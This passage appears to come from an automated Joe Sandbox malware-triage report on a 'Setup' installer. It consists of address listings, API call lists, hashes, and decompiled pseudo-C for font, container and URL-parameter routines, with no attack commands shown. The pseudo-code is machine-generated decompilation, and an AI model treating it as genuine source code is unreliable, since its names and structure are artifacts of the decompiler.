                                                                                                                                                              0x004e01e6
                                                                                                                                                              0x004e01ec
                                                                                                                                                              0x004e01fa
                                                                                                                                                              0x004e01ff
                                                                                                                                                              0x004e0209
                                                                                                                                                              0x004e020e
                                                                                                                                                              0x004e0218
                                                                                                                                                              0x004e0239
                                                                                                                                                              0x004e0245
                                                                                                                                                              0x004e024b
                                                                                                                                                              0x004e0255
                                                                                                                                                              0x004e025b
                                                                                                                                                              0x004e0262
                                                                                                                                                              0x004e0275
                                                                                                                                                              0x004e0264
                                                                                                                                                              0x004e026d
                                                                                                                                                              0x004e026d
                                                                                                                                                              0x004e027f
                                                                                                                                                              0x004e029b
                                                                                                                                                              0x004e02a7
                                                                                                                                                              0x004e02ad
                                                                                                                                                              0x004e02bb
                                                                                                                                                              0x004e02c0
                                                                                                                                                              0x004e02ca
                                                                                                                                                              0x004e02cf
                                                                                                                                                              0x004e02d9
                                                                                                                                                              0x004e02e4
                                                                                                                                                              0x004e02ed
                                                                                                                                                              0x004e02f6
                                                                                                                                                              0x004e02fb
                                                                                                                                                              0x004e0300
                                                                                                                                                              0x004e0322
                                                                                                                                                              0x004e032e
                                                                                                                                                              0x004e0334
                                                                                                                                                              0x004e033e
                                                                                                                                                              0x004e0344
                                                                                                                                                              0x004e034b
                                                                                                                                                              0x004e035e
                                                                                                                                                              0x004e034d
                                                                                                                                                              0x004e0356
                                                                                                                                                              0x004e0356
                                                                                                                                                              0x004e0386
                                                                                                                                                              0x004e038b
                                                                                                                                                              0x004e038e
                                                                                                                                                              0x004e039a
                                                                                                                                                              0x004e03a0
                                                                                                                                                              0x004e03ae
                                                                                                                                                              0x004e03b3
                                                                                                                                                              0x004e03bd
                                                                                                                                                              0x004e03c2
                                                                                                                                                              0x004e03cc
                                                                                                                                                              0x004e03cc
                                                                                                                                                              0x004e03e8
                                                                                                                                                              0x004e03ed
                                                                                                                                                              0x004e040b
                                                                                                                                                              0x004e0417
                                                                                                                                                              0x004e041d
                                                                                                                                                              0x004e042f
                                                                                                                                                              0x004e0434
                                                                                                                                                              0x004e0440
                                                                                                                                                              0x004e0446
                                                                                                                                                              0x004e0457
                                                                                                                                                              0x004e0466
                                                                                                                                                              0x004e0475
                                                                                                                                                              0x004e047b
                                                                                                                                                              0x004e047c
                                                                                                                                                              0x004e0481
                                                                                                                                                              0x004e0496
                                                                                                                                                              0x004e049b
                                                                                                                                                              0x004e049e
                                                                                                                                                              0x004e04a8
                                                                                                                                                              0x004e04ad
                                                                                                                                                              0x004e04b7
                                                                                                                                                              0x004e04bc
                                                                                                                                                              0x004e04c6
                                                                                                                                                              0x004e04ce
                                                                                                                                                              0x004e04d0
                                                                                                                                                              0x004e04e0
                                                                                                                                                              0x004e04d2
                                                                                                                                                              0x004e04d8
                                                                                                                                                              0x004e04d8
                                                                                                                                                              0x004e04f4
                                                                                                                                                              0x004e0500
                                                                                                                                                              0x004e0505
                                                                                                                                                              0x004e0508
                                                                                                                                                              0x004e0514
                                                                                                                                                              0x004e051a
                                                                                                                                                              0x004e0524
                                                                                                                                                              0x004e052a
                                                                                                                                                              0x004e0531
                                                                                                                                                              0x004e0544
                                                                                                                                                              0x004e0533
                                                                                                                                                              0x004e053c
                                                                                                                                                              0x004e053c
                                                                                                                                                              0x004e0555
                                                                                                                                                              0x004e055a
                                                                                                                                                              0x004e055d
                                                                                                                                                              0x004e0569
                                                                                                                                                              0x004e056f
                                                                                                                                                              0x004e0579
                                                                                                                                                              0x004e0586
                                                                                                                                                              0x004e0599
                                                                                                                                                              0x004e0588
                                                                                                                                                              0x004e0591
                                                                                                                                                              0x004e0591
                                                                                                                                                              0x004e05be
                                                                                                                                                              0x004e05ca
                                                                                                                                                              0x004e05d0
                                                                                                                                                              0x004e05ef
                                                                                                                                                              0x004e05fb
                                                                                                                                                              0x004e0601
                                                                                                                                                              0x004e061a
                                                                                                                                                              0x004e061f
                                                                                                                                                              0x004e0622
                                                                                                                                                              0x004e062e
                                                                                                                                                              0x004e0634
                                                                                                                                                              0x004e0642
                                                                                                                                                              0x004e0647
                                                                                                                                                              0x004e0651
                                                                                                                                                              0x004e0656
                                                                                                                                                              0x004e0660
                                                                                                                                                              0x004e0665
                                                                                                                                                              0x004e066f
                                                                                                                                                              0x004e0674
                                                                                                                                                              0x004e067e
                                                                                                                                                              0x004e0683
                                                                                                                                                              0x004e068d
                                                                                                                                                              0x004e069c
                                                                                                                                                              0x004e06b0
                                                                                                                                                              0x004e06c2
                                                                                                                                                              0x004e06c9
                                                                                                                                                              0x004e06d9
                                                                                                                                                              0x004e06cb
                                                                                                                                                              0x004e06d1
                                                                                                                                                              0x004e06d1
                                                                                                                                                              0x004e06f6
                                                                                                                                                              0x004e06fb
                                                                                                                                                              0x004e06fe
                                                                                                                                                              0x004e070a
                                                                                                                                                              0x004e0710
                                                                                                                                                              0x004e071e
                                                                                                                                                              0x004e0723
                                                                                                                                                              0x004e072d
                                                                                                                                                              0x004e072d
                                                                                                                                                              0x004e0737
                                                                                                                                                              0x004e0738
                                                                                                                                                              0x004e073e
                                                                                                                                                              0x004e074e
                                                                                                                                                              0x004e075b
                                                                                                                                                              0x004e075c
                                                                                                                                                              0x004e0762
                                                                                                                                                              0x004e0763
                                                                                                                                                              0x004e0769
                                                                                                                                                              0x004e076a
                                                                                                                                                              0x004e0779
                                                                                                                                                              0x004e077e
                                                                                                                                                              0x004e0786
                                                                                                                                                              0x004e0796
                                                                                                                                                              0x004e0788
                                                                                                                                                              0x004e078e
                                                                                                                                                              0x004e078e
                                                                                                                                                              0x004e07aa
                                                                                                                                                              0x004e07b6
                                                                                                                                                              0x004e07bb
                                                                                                                                                              0x004e07be
                                                                                                                                                              0x004e07ca
                                                                                                                                                              0x004e07d0
                                                                                                                                                              0x004e07de
                                                                                                                                                              0x004e07e3
                                                                                                                                                              0x004e07ed
                                                                                                                                                              0x004e07f5
                                                                                                                                                              0x004e07fa
                                                                                                                                                              0x004e07fd
                                                                                                                                                              0x004e07ff
                                                                                                                                                              0x004e0812
                                                                                                                                                              0x004e0817
                                                                                                                                                              0x004e081f
                                                                                                                                                              0x004e082f
                                                                                                                                                              0x004e0821
                                                                                                                                                              0x004e0827
                                                                                                                                                              0x004e0827
                                                                                                                                                              0x004e084c
                                                                                                                                                              0x004e0851
                                                                                                                                                              0x004e0854
                                                                                                                                                              0x004e0860
                                                                                                                                                              0x004e0866
                                                                                                                                                              0x004e0874
                                                                                                                                                              0x004e0879
                                                                                                                                                              0x004e0883
                                                                                                                                                              0x004e0883
                                                                                                                                                              0x004e088f
                                                                                                                                                              0x004e0894
                                                                                                                                                              0x004e0897
                                                                                                                                                              0x004e08a3
                                                                                                                                                              0x004e08a9
                                                                                                                                                              0x004e08b3
                                                                                                                                                              0x004e08c0
                                                                                                                                                              0x004e08d3
                                                                                                                                                              0x004e08c2
                                                                                                                                                              0x004e08cb
                                                                                                                                                              0x004e08cb
                                                                                                                                                              0x004e08e7
                                                                                                                                                              0x004e08ec
                                                                                                                                                              0x004e08f6
                                                                                                                                                              0x004e08ff
                                                                                                                                                              0x004e0904
                                                                                                                                                              0x004e0909
                                                                                                                                                              0x004e0910
                                                                                                                                                              0x004e0920
                                                                                                                                                              0x004e0912
                                                                                                                                                              0x004e0918
                                                                                                                                                              0x004e0918
                                                                                                                                                              0x004e093d
                                                                                                                                                              0x004e0942
                                                                                                                                                              0x004e0945
                                                                                                                                                              0x004e0951
                                                                                                                                                              0x004e0957
                                                                                                                                                              0x004e0965
                                                                                                                                                              0x004e096a
                                                                                                                                                              0x004e0974
                                                                                                                                                              0x004e0974
                                                                                                                                                              0x004e0982
                                                                                                                                                              0x004e098c
                                                                                                                                                              0x004e098c
                                                                                                                                                              0x004e09a6
                                                                                                                                                              0x004e09b0
                                                                                                                                                              0x004e09b0
                                                                                                                                                              0x004e09bf
                                                                                                                                                              0x004e09c9
                                                                                                                                                              0x004e09c9
                                                                                                                                                              0x004e09e3
                                                                                                                                                              0x004e09ed
                                                                                                                                                              0x004e09ed
                                                                                                                                                              0x004e09f8
                                                                                                                                                              0x004e09fd
                                                                                                                                                              0x004e0a05
                                                                                                                                                              0x004e0a15
                                                                                                                                                              0x004e0a07
                                                                                                                                                              0x004e0a0d
                                                                                                                                                              0x004e0a0d
                                                                                                                                                              0x004e0a3a
                                                                                                                                                              0x004e0a46
                                                                                                                                                              0x004e0a4c
                                                                                                                                                              0x004e0a5a
                                                                                                                                                              0x004e0a5f
                                                                                                                                                              0x004e0a69
                                                                                                                                                              0x004e0a75
                                                                                                                                                              0x004e0a7a
                                                                                                                                                              0x004e0a7d
                                                                                                                                                              0x004e0a89
                                                                                                                                                              0x004e0a8f
                                                                                                                                                              0x004e0a99
                                                                                                                                                              0x004e0a9f
                                                                                                                                                              0x004e0aa6
                                                                                                                                                              0x004e0ab9
                                                                                                                                                              0x004e0aa8
                                                                                                                                                              0x004e0ab1
                                                                                                                                                              0x004e0ab1
                                                                                                                                                              0x004e0acd
                                                                                                                                                              0x004e0ad2
                                                                                                                                                              0x004e0adc
                                                                                                                                                              0x004e0ae1
                                                                                                                                                              0x004e0aeb
                                                                                                                                                              0x004e0af9
                                                                                                                                                              0x004e0aed
                                                                                                                                                              0x004e0aed
                                                                                                                                                              0x004e0aed
                                                                                                                                                              0x004e0b03
                                                                                                                                                              0x004e0b0d
                                                                                                                                                              0x004e0b19
                                                                                                                                                              0x004e0b2b
                                                                                                                                                              0x004e0b1b
                                                                                                                                                              0x004e0b23
                                                                                                                                                              0x004e0b23
                                                                                                                                                              0x004e0b48
                                                                                                                                                              0x004e0b4d
                                                                                                                                                              0x004e0b50
                                                                                                                                                              0x004e0b5c
                                                                                                                                                              0x004e0b62
                                                                                                                                                              0x004e0b70
                                                                                                                                                              0x004e0b75
                                                                                                                                                              0x004e0b7f
                                                                                                                                                              0x004e0b8e
                                                                                                                                                              0x004e0b97
                                                                                                                                                              0x004e0ba9
                                                                                                                                                              0x004e0b99
                                                                                                                                                              0x004e0ba1
                                                                                                                                                              0x004e0ba1
                                                                                                                                                              0x004e0bc6
                                                                                                                                                              0x004e0bcb
                                                                                                                                                              0x004e0bce
                                                                                                                                                              0x004e0bda
                                                                                                                                                              0x004e0be0
                                                                                                                                                              0x004e0bee
                                                                                                                                                              0x004e0bf3
                                                                                                                                                              0x004e0bfd
                                                                                                                                                              0x004e0bfd
                                                                                                                                                              0x004e0c02
                                                                                                                                                              0x004e0c0a
                                                                                                                                                              0x004e0c0c
                                                                                                                                                              0x004e0c0e
                                                                                                                                                              0x004e0c23
                                                                                                                                                              0x004e0c23
                                                                                                                                                              0x004e0c2b
                                                                                                                                                              0x004e0c30
                                                                                                                                                              0x004e0c3e
                                                                                                                                                              0x004e0c43
                                                                                                                                                              0x004e0c4f
                                                                                                                                                              0x004e0c55
                                                                                                                                                              0x004e0c5f
                                                                                                                                                              0x004e0c6c
                                                                                                                                                              0x004e0c7f
                                                                                                                                                              0x004e0c6e
                                                                                                                                                              0x004e0c77
                                                                                                                                                              0x004e0c77
                                                                                                                                                              0x004e0ca4
                                                                                                                                                              0x004e0cb0
                                                                                                                                                              0x004e0cb6
                                                                                                                                                              0x004e0cc4
                                                                                                                                                              0x004e0cc9
                                                                                                                                                              0x004e0cd3
                                                                                                                                                              0x004e0cd8
                                                                                                                                                              0x004e0ce2
                                                                                                                                                              0x004e0cee
                                                                                                                                                              0x004e0cfc
                                                                                                                                                              0x004e0d02
                                                                                                                                                              0x004e0d09
                                                                                                                                                              0x004e0d0e
                                                                                                                                                              0x004e0d15
                                                                                                                                                              0x004e0d1a
                                                                                                                                                              0x004e0d21
                                                                                                                                                              0x004e0d26
                                                                                                                                                              0x004e0d2c
                                                                                                                                                              0x004e0d41

                                                                                                                                                              APIs
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E016D
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E027F
                                                                                                                                                              • PathFindFileNameW.SHLWAPI(00000000,&sufn=,00000000,?,?,?,?,&moldid=,00000000,?,?,?,?,?), ref: 004E0371
                                                                                                                                                                • Part of subcall function 00484EA0: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 00484F0F
                                                                                                                                                                • Part of subcall function 00484EA0: _memset.LIBCMT ref: 00484F43
                                                                                                                                                                • Part of subcall function 00484EA0: __wcstoi64.LIBCMT ref: 00484F6F
                                                                                                                                                                • Part of subcall function 0047F670: std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 0047F6A8
                                                                                                                                                                • Part of subcall function 0047F670: _memset.LIBCMT ref: 0047F6DE
                                                                                                                                                                • Part of subcall function 0047F670: _swscanf.LIBCMT ref: 0047F743
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E073F
                                                                                                                                                              • _Immortalize.LIBCPMTD ref: 004E074F
                                                                                                                                                                • Part of subcall function 00502490: GetLocaleInfoW.KERNEL32(00000400,0000005A,?,00000008,DDD124F9,?,00000000,00508795,000000FF,?,004E09FD,?,00000000,0000000C,0000005A,00000000), ref: 005024F3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Immortalize$Iterator_baseIterator_base::__memsetstd::_$FileFindInfoLocaleNamePath__wcstoi64_swscanf
                                                                                                                                                              • String ID: &avr=$&cntry=$&dnt=$&gloss=$&ibprs=$&ibprv=$&iev=%d&ffv=%d&crv=%d&dwb=%s&dlb=%s&wbr=%d$&mntrId=$&moldid=$&notc=1$&noupgrd=1$&osp=$&sufn=$&sutp=%d&sufl=%d&tbp=%d&prver=%d&minreq=%d&dtct=%d&wvr=%d$&tbinst=1$&tbtp=$&test=$&voices=$&w64=1$/'N$/'N$WBR$hbS$ver=
                                                                                                                                                              • API String ID: 327512372-716390181
                                                                                                                                                              • Opcode ID: 0d9d1d5d97aa150563532568ba6dffd530cae01ca486fc6dbeb3aa38ddd38cb6
                                                                                                                                                              • Instruction ID: 3b98f8d82bb84df878d0254f465412ed47e9ad28aab4b3b75e605d2f278c53bf
                                                                                                                                                              • Opcode Fuzzy Hash: 0d9d1d5d97aa150563532568ba6dffd530cae01ca486fc6dbeb3aa38ddd38cb6
                                                                                                                                                              • Instruction Fuzzy Hash: B2828DB0D012589BDB24EB65DD45BDEB7B4AF54308F1080EEE10967282DB786F88CF59
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00424140 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 336 424140-424154 337 424156-42415c 336->337 338 42415e-424166 GetDC 336->338 339 424169-4241c4 CreateFontW SelectObject GetTextFaceW 337->339 338->339 340 4241c6-4241cd 339->340 341 4241cf-4241d9 GetTextCharset 339->341 342 4241dc-4241e6 340->342 341->342 343 4241f6-424208 SelectObject 342->343 344 4241e8-4241f0 GetTextMetricsW 342->344 345 424216-42421d 343->345 346 42420a-424210 ReleaseDC 343->346 344->343 347 42423b-42424c DeleteObject 345->347 348 42421f-424227 345->348 346->345 351 424264-424274 call 44f6c8 347->351 349 424229-424239 StrStrIW 348->349 350 42424e-424252 348->350 349->347 349->350 350->351 352 424254-424261 call 45184a 350->352 352->351
                                                                                                                                                              C-Code - Quality: 96%
                                                                                                                                                              			E00424140(void* __ebx, void* __edi, void* __esi, WCHAR* _a4, signed int _a8, int _a12, int _a16, intOrPtr _a20, intOrPtr _a24, struct tagTEXTMETRICW* _a28) {
				struct HDC__* _v8;
				signed int _v12;
				short _v76;
				struct HFONT__* _v80;
				struct HWND__* _v84;
				void* _v88;
				struct HDC__* _v92;
				int _v96;
				signed int _t43;
				WCHAR* _t63;
				void* _t67;
				void* _t86;
				void* _t87;
				signed int _t88;

				_t87 = __esi;
				_t86 = __edi;
				_t67 = __ebx;
				_t43 =  *0x561244; // 0xddd124f9
				_v12 = _t43 ^ _t88;
				if(_a20 == 0) {
					_v92 = GetDC(0);
				} else {
					_v92 = _a20;
				}
				_v8 = _v92;
				_v80 = CreateFontW(_a12, 0, 0, 0, _a16, 0, 0, 0, _a8 & 0x000000ff, 0, 0, 0, 0, _a4);
				_v88 = SelectObject(_v8, _v80);
				GetTextFaceW(_v8, 0x20,  &_v76);
				if((_a8 & 0x000000ff) != 0) {
					_v96 = GetTextCharset(_v8);
				} else {
					_v96 = 0;
				}
				_v84 = _v96;
				if(_a28 != 0) {
					GetTextMetricsW(_v8, _a28); // executed
				}
				SelectObject(_v8, _v88);
				if(_a20 == 0) {
					ReleaseDC(0, _v8);
				}
				if(_v84 != (_a8 & 0x000000ff)) {
					L13:
					_t83 = _v80;
					DeleteObject(_v80);
					_v80 = 0;
					goto L16;
				} else {
					_t83 =  *_a4 & 0x0000ffff;
					if(( *_a4 & 0x0000ffff) == 0) {
						L14:
						if(_a24 != 0) {
							E0045184A(_a24,  &_v76);
						}
						L16:
						return E0044F6C8(_v80, _t67, _v12 ^ _t88, _t83, _t86, _t87);
					}
					_t63 = StrStrIW( &_v76, _a4); // executed
					if(_t63 != 0) {
						goto L14;
					}
					goto L13;
				}
			}

















                                                                                                                                                              0x00424140
                                                                                                                                                              0x00424140
                                                                                                                                                              0x00424140
                                                                                                                                                              0x00424146
                                                                                                                                                              0x0042414d
                                                                                                                                                              0x00424154
                                                                                                                                                              0x00424166
                                                                                                                                                              0x00424156
                                                                                                                                                              0x00424159
                                                                                                                                                              0x00424159
                                                                                                                                                              0x0042416c
                                                                                                                                                              0x0042419a
                                                                                                                                                              0x004241ab
                                                                                                                                                              0x004241b8
                                                                                                                                                              0x004241c4
                                                                                                                                                              0x004241d9
                                                                                                                                                              0x004241c6
                                                                                                                                                              0x004241c6
                                                                                                                                                              0x004241c6
                                                                                                                                                              0x004241df
                                                                                                                                                              0x004241e6
                                                                                                                                                              0x004241f0
                                                                                                                                                              0x004241f0
                                                                                                                                                              0x004241fe
                                                                                                                                                              0x00424208
                                                                                                                                                              0x00424210
                                                                                                                                                              0x00424210
                                                                                                                                                              0x0042421d
                                                                                                                                                              0x0042423b
                                                                                                                                                              0x0042423b
                                                                                                                                                              0x0042423f
                                                                                                                                                              0x00424245
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0042421f
                                                                                                                                                              0x00424222
                                                                                                                                                              0x00424227
                                                                                                                                                              0x0042424e
                                                                                                                                                              0x00424252
                                                                                                                                                              0x0042425c
                                                                                                                                                              0x00424261
                                                                                                                                                              0x00424264
                                                                                                                                                              0x00424274
                                                                                                                                                              0x00424274
                                                                                                                                                              0x00424231
                                                                                                                                                              0x00424239
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00424239

                                                                                                                                                              APIs
                                                                                                                                                              • GetDC.USER32(00000000), ref: 00424160
                                                                                                                                                              • CreateFontW.GDI32(0053C118,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00424194
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 004241A5
                                                                                                                                                              • GetTextFaceW.GDI32(00000000,00000020,?), ref: 004241B8
                                                                                                                                                              • GetTextCharset.GDI32(00000000), ref: 004241D3
                                                                                                                                                              • GetTextMetricsW.GDI32(00000000,00000000), ref: 004241F0
                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 004241FE
                                                                                                                                                              • ReleaseDC.USER32 ref: 00424210
                                                                                                                                                              • StrStrIW.SHLWAPI(?,?), ref: 00424231
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0042423F
                                                                                                                                                              • _wcscpy.LIBCMT ref: 0042425C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000002.00000002.359012416.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000002.00000002.359001530.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359261162.000000000051B000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359338019.0000000000561000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359376562.0000000000562000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005BB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359452594.00000000005C0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              • Associated: 00000002.00000002.359476610.00000000005C5000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_2_2_400000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ObjectText$Select$CharsetCreateDeleteFaceFontMetricsRelease_wcscpy
                                                                                                                                                              • String ID: .DB
                                                                                                                                                              • API String ID: 588102623-3243579461
                                                                                                                                                              • Opcode ID: 4ca0d98cf20631fccaf790c2c32be238378f39f3350437f1d2a6cd27e18ae94b
                                                                                                                                                              • Instruction ID: ea6a59b79ecef2f09fddcaa62a7bb6481acd72d89f002cd1ffdad0adaeb43d27
                                                                                                                                                              • Opcode Fuzzy Hash: 4ca0d98cf20631fccaf790c2c32be238378f39f3350437f1d2a6cd27e18ae94b
                                                                                                                                                              • Instruction Fuzzy Hash: A7415C74A00208EFEB14CFE4DC48BEE7BB5EF98701F10814AF919AB284D7749945DB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 00433210 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 387memoryCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 357 433210-43324a call 434290 360 433289-4332a4 call 433ac0 357->360 361 43324c-433284 call 4134d0 call 413d50 call 456a4c call 413c20 357->361 365 4332a9-4332c4 360->365 361->360 366 4332c6-4332ed call 41d410 call 433680 call 433720 365->366 367 4332ef-4332f5 365->367 389 433353-433356 366->389 370 4332f7-433315 call 415110 call 433680 367->370 371 433326-433344 call 441910 call 433720 367->371 391 433317-433322 call 433680 370->391 392 433324 370->392 371->389 390 433346-433351 call 433720 371->390 394 433359-433375 call 42ae30 call 436ba0 389->394 390->389 391->392 392->389 402 43337b-4333af call 42ae30 * 3 call 415110 394->402 403 433649-43367d call 41d410 call 436ba0 call 445360 394->403 418 4333b5-4333ed call 42ae30 * 2 call 441910 call 436ba0 402->418 419 4334ff-433537 call 42ae30 * 2 call 415110 call 436ba0 402->419 436 4333ef-433459 call 42ae30 call 436ba0 * 2 call 42ae30 * 2 call 436ba0 call 42ae30 * 2 418->436 437 43345e-43347a call 42ae30 call 441910 418->437 438 433539-4335a3 call 42ae30 call 436ba0 * 2 call 42ae30 * 2 call 436ba0 call 42ae30 * 2 419->438 439 4335a8-4335c4 call 42ae30 call 415110 419->439 512 4334fa 436->512 457 433499-4334f5 call 42ae30 call 436ba0 call 42ae30 * 2 call 436ba0 call 42ae30 * 2 call 433740 437->457 458 43347c-433494 call 42ae30 call 427b10 437->458 513 433644 438->513 460 4335e3-43363f call 42ae30 call 436ba0 call 42ae30 * 2 call 436ba0 call 42ae30 * 2 call 427b10 439->460 461 4335c6-4335de call 42ae30 call 433740 439->461 457->512 458->457 460->513 461->460 512->513 513->394
                                                                                                                                                              C-Code - Quality: 94%
                                                                                                                                                              			E00433210(intOrPtr __ecx, void* __eflags, intOrPtr _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v64;
				char _v92;
				intOrPtr _v96;
				signed int _t94;
				intOrPtr _t101;
				intOrPtr* _t103;
				intOrPtr* _t104;
				char* _t107;
				intOrPtr* _t113;
				intOrPtr* _t117;
				char* _t122;
				intOrPtr* _t125;
				intOrPtr* _t134;
				intOrPtr* _t137;
				intOrPtr* _t149;
				char* _t156;
				intOrPtr* _t159;
				intOrPtr* _t168;
				intOrPtr* _t171;
				intOrPtr* _t184;
				intOrPtr* _t187;
				intOrPtr* _t188;
				signed int _t291;
				void* _t292;
				void* _t293;
				void* _t295;
				void* _t300;
				void* _t304;
				void* _t306;
				void* _t323;
				void* _t325;

				_push(0xffffffff);
				_push(0x517298);
				_push( *[fs:0x0]);
				_t293 = _t292 - 0x50;
				_t94 =  *0x561244; // 0xddd124f9
				_push(_t94 ^ _t291);
				 *[fs:0x0] =  &_v16;
				_v96 = __ecx;
				if(E00434290(_v96) - 1 <=  *((intOrPtr*)(_v96 + 8))) {
					E004134D0( &_v92, "map/set<T> too long");
					_v8 = 0;
					E00413D50( &_v92);
					E00456A4C( &_v64, 0x544b50);
					_v8 = 0xffffffff;
					E00413C20( &_v92);
				}
				_t101 = E00433AC0( *((intOrPtr*)(_v96 + 4)), _a12,  *((intOrPtr*)(_v96 + 4)), _a16, 0); // executed
				_v20 = _t101;
				 *((intOrPtr*)(_v96 + 8)) =  *((intOrPtr*)(_v96 + 8)) + 1;
				if(_a12 !=  *((intOrPtr*)(_v96 + 4))) {
					__eflags = _a8 & 0x000000ff;
					if((_a8 & 0x000000ff) == 0) {
						_t103 = E00441910(_a12);
						_t293 = _t293 + 4;
						 *_t103 = _v20;
						_t104 = E00433720(_v96);
						__eflags = _a12 -  *_t104;
						if(_a12 ==  *_t104) {
							 *((intOrPtr*)(E00433720(_v96))) = _v20;
						}
					} else {
						_t187 = E00415110(_a12);
						_t293 = _t293 + 4;
						 *_t187 = _v20;
						_t188 = E00433680(_v96);
						__eflags = _a12 -  *_t188;
						if(_a12 ==  *_t188) {
							 *((intOrPtr*)(E00433680(_v96))) = _v20;
						}
					}
				} else {
					 *((intOrPtr*)(E0041D410(_v96))) = _v20;
					 *((intOrPtr*)(E00433680(_v96))) = _v20;
					 *((intOrPtr*)(E00433720(_v96))) = _v20;
				}
				_v24 = _v20;
				while(1) {
					_t107 = E00436BA0( *((intOrPtr*)(E0042AE30(_v24))));
					_t295 = _t293 + 8;
					if( *_t107 != 0) {
						break;
					}
					_t113 = E0042AE30(_v24);
					_t117 = E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))));
					_t300 = _t295 + 0x10;
					if( *_t113 !=  *_t117) {
						_a12 =  *((intOrPtr*)(E00415110( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t122 = E00436BA0(_a12);
						_t304 = _t300 + 0x10;
						__eflags =  *_t122;
						if( *_t122 != 0) {
							_t125 = E00415110( *((intOrPtr*)(E0042AE30(_v24))));
							_t306 = _t304 + 8;
							__eflags = _v24 -  *_t125;
							if(_v24 ==  *_t125) {
								_t137 = E0042AE30(_v24);
								_t306 = _t306 + 4;
								_v24 =  *_t137;
								E00433740(_v96, __eflags, _v24);
							}
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t134 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t306 + 0x1c;
							E00427B10(_v96, __eflags,  *_t134);
						} else {
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30(_v24)))))) = 1;
							 *((char*)(E00436BA0(_a12))) = 1;
							 *((char*)(E00436BA0( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24))))))))) = 0;
							_t149 = E0042AE30( *((intOrPtr*)(E0042AE30(_v24))));
							_t293 = _t304 + 0x20;
							_v24 =  *_t149;
						}
					} else {
						_a12 =  *((intOrPtr*)(E00441910( *((intOrPtr*)(E0042AE30( *((intOrPtr*)(E0042AE30(_v24)))))))));
						_t156 = E00436BA0(_a12);
						_t323 = _t300 + 0x10;
						if( *_t156 != 0) {
							_t159 = E00441910( *((intOrPtr*)(E0042AE30(_v24))));
							_t325 = _t323 + 8;
							__eflags = _v24 -  *_t159;
							if(_v24 ==  *_t159) {
								_t171 = E0042AE30(_v24);
								_t325 = _t325 + 4;
								_v24 =  *_t171;
								E00427B10(_v96, __eflags, _v24);
							}
